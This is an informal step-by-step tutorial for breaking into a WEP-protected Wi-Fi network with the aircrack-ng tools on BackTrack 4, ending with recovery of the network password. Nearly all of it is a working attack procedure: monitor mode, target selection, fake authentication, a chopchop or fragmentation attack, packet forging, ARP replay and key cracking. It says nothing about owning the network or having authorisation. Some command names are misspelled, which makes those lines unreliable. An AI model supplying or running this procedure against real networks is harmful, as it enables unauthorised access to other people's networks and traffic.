Alright let's start first what we need to complete this task:

1. Backtrack 4 life CD/USB or installation;
2. Willing to read all this :)

The first you can download for free from here: http://www.backtrack-linux.org/downloads/.

Username to enter backtrack: root
Password: toor
Type startx and hit ENTER key to fire up the graphic of BT4.

Web need opened 3 terminals and let's start:

1. Airomon-ng stop wlan0 (This command stops the wifi adaptor)

2. Airomon-ng start wlan0 (This command starts the wifi adaptor in monitoring mode)

3. Airodump-ng wlan0 (This command is used only to pick network for test,by signal strenght, channel, BSSID, ESSID. The command is stopped with CTRL+C)

4. Airodump-ng --channel (Channel number) --bssid (MAC address of the network) -w (File name to be saved the captured information) wlan0 (Leave this running and open new terminal)

5. Macchanger wlan0 (This command returns your MAC address which is used later)

6. Aireplay-ng -1 0 -e (ESSID name of the network) -a (BSSID MAC address of the network) -h (My MAC address of macchanger command) wlan0 (Wait for success)

7. Aireplay-ng -4 (If not successful try 5) -b (BSSID MAC address of the network) -h (My MAC address of macchanger command) wlan0 (When it ask for packet use, type Y and hit ENTER key)

8. Packetforge-ng -0 -a (BSSID of the network) -h (My MAC address from macchanger command) -k 255.255.255.255 -l 255.255.255.255 -y (The file name of step 7 *.xor) -w (Type file name to save and hit ENTER key)

9. Aireplay-ng -2 -r (The file name from Packetforge-ng command) wlan0 (Wait untill the packet counter reachs at least 25 000 packets)

10. Stop step 4 Airodump-ng command with CTRL+C

11. Aircrack-ng -b (BSSID MAC address of the network) (File name of Airodump-ng step 4, copy from the desktop *.cap and hit ENTER key)

Wait little and then get the password :)